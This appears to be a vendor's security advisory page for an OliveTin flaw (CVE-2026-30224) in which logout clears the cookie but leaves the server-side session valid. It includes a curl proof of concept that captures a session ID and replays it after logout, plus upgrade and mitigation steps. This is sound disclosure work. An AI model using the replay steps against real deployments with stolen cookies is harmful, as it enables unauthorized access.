Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
🐹 Go

GHSA-gq2m-77hf-vwgh

MEDIUM

OliveTin Session Fixation: Logout Fails to Invalidate Server-Side Session

Also known asCVE-2026-30224GO-2026-4623
Published
Mar 5, 2026
Updated
Mar 23, 2026
Affected
1 pkg
Patched
1 / 1
Exploits
None indexed

EPSS Exploitation Probability

via FIRST.org ↗
0.3%probability of exploitation in next 30 days
Lower Risk22th percentile+0.26%
0.00%0.27%0.53%0.80%0.0%0.0%0.0%0.3%Apr 26Jun 26Jun 26

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

Blast Radius

1 pkg affected
🐹github.com/OliveTin/OliveTin

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects Go packages — download data is not available via public APIs for these ecosystems.

Description

Summary

OliveTin does not revoke server-side sessions when a user logs out. Although the browser cookie is cleared, the corresponding session remains valid in server storage until expiry (default ≈ 1 year).

An attacker with a previously stolen or captured session cookie can continue authenticating after logout, resulting in a post-logout authentication bypass.

This is a session management flaw that violates expected logout semantics.

Details

During logout:

// Logout only clears browser cookie
response.Header().Set("Set-Cookie", localCookie.String())

However, the server still accepts the session:

session := sessionStorage.Providers[provider].Sessions[sid]
...
return session

The SID is not deleted from sessionStorage.

Why vulnerable: Logout does not remove the SID from sessionStorage; old cookie is still accepted until expiry (~1 year).

File: api.go, sessions.go, local.go Lines: api.go:392-427; sessions.go:39-59, 61-80; local.go:32-47 Behavior

  • Login → receive SID cookie
  • Logout → cookie cleared client-side
  • Replay old SID manually → still authenticated

Expected:

  • Logout invalidates session immediately

Actual:

  • Old SID remains usable until expiry

PoC

Minimal config

listenAddressSingleHTTPFrontend: 0.0.0.0:16642
authRequireGuestsToLogin: true

authLocalUsers:
  enabled: true
  users:
    - username: low
      usergroup: users
      password: "$argon2id$..."

actions:
  - title: Dummy
    id: dummy
    shell: "echo dummy"

Reproduction

Login and capture SID:

LOGIN=$(curl -i -X POST http://localhost:16642/api/LocalUserLogin \
  -H 'Content-Type: application/json' \
  -d '{"username":"low","password":"lowpass"}')

SID=$(printf '%s\n' "$LOGIN" | awk -F'[=;]' '/olivetin-sid-local/{print $2}')

Works before logout:

curl -X POST http://localhost:16642/api/WhoAmI \
  -H "Cookie: olivetin-sid-local=$SID"

Logout:

curl -X POST http://localhost:16642/api/Logout \
  -H "Cookie: olivetin-sid-local=$SID"

Replay old cookie:

curl -X POST http://localhost:16642/api/WhoAmI \
  -H "Cookie: olivetin-sid-local=$SID"

Result

User is still authenticated after logout.

Impact

Type:

Session Management Flaw

  • Logout Bypass
  • Session Replay

Risk:

  • Stolen cookies remain valid
  • Persistent unauthorized access
  • Users falsely believe logout ended the session

Attack scenarios:

  • Shared computers
  • XSS/session theft
  • Proxy logs
  • Malware/browser compromise

Affected Packages

1 total 1 fixed
EcosystemPackageVulnerable rangeFix
🐹Gogithub.com/OliveTin/OliveTinall versions0.0.0-20260304233115-d6a0abc3755d15

Detection & mitigation playbook

Open-source dependency

  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for github.com/OliveTin/OliveTin. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

  2. Fix

    Update github.com/OliveTin/OliveTin to 0.0.0-20260304233115-d6a0abc3755d15 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-gq2m-77hf-vwgh is resolved across your whole dependency graph.

  3. Workarounds

    If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

  4. How O3 protects you

    O3 pinpoints whether GHSA-gq2m-77hf-vwgh is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-gq2m-77hf-vwgh. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

### Summary OliveTin does not revoke server-side sessions when a user logs out. Although the browser cookie is cleared, the corresponding session remains valid in server storage until expiry (default ≈ 1 year). An attacker with a previously stolen or captured session cookie can continue authenticating after logout, resulting in a post-logout authentication bypass. This is a session management flaw that violates expected logout semantics. ### Details During logout: ``` // Logout only clears browser cookie response.Header().Set("Set-Cookie", localCookie.String()) ``` However, the server still
O3 Security · Impact-Aware SCA

Is GHSA-gq2m-77hf-vwgh in your dependencies?

O3 detects GHSA-gq2m-77hf-vwgh across Go dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.

Scan my dependencies How O3 SCA works